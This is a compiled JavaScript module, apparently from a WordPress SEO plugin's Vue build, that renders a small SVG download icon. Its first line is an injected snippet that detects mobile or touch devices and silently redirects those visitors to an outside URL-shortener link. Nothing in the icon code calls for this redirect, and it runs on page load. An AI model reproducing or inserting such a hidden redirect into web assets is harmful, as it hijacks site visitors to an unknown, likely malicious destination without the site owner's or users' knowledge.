(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as o}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as r,i as t,j as e}from"./vendor-vue-ui.232c7c36.js";const s={},l={viewBox:"0 0 14 14",fill:"none",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-download"};function a(c,n){return r(),t("svg",l,[...n[0]||(n[0]=[e("path",{"fill-rule":"evenodd","clip-rule":"evenodd",d:"M11.0833 5.54199H8.74999V2.04199H5.24999V5.54199H2.91666L6.99999 9.62533L11.0833 5.54199ZM6.41662 6.70866V3.20866H7.58329V6.70866H8.26579L6.99996 7.97449L5.73412 6.70866H6.41662ZM11.0833 11.9587V10.792H2.91666V11.9587H11.0833Z",fill:"currentColor"},null,-1)])])}const p=o(s,[["render",a]]);export{p as S};
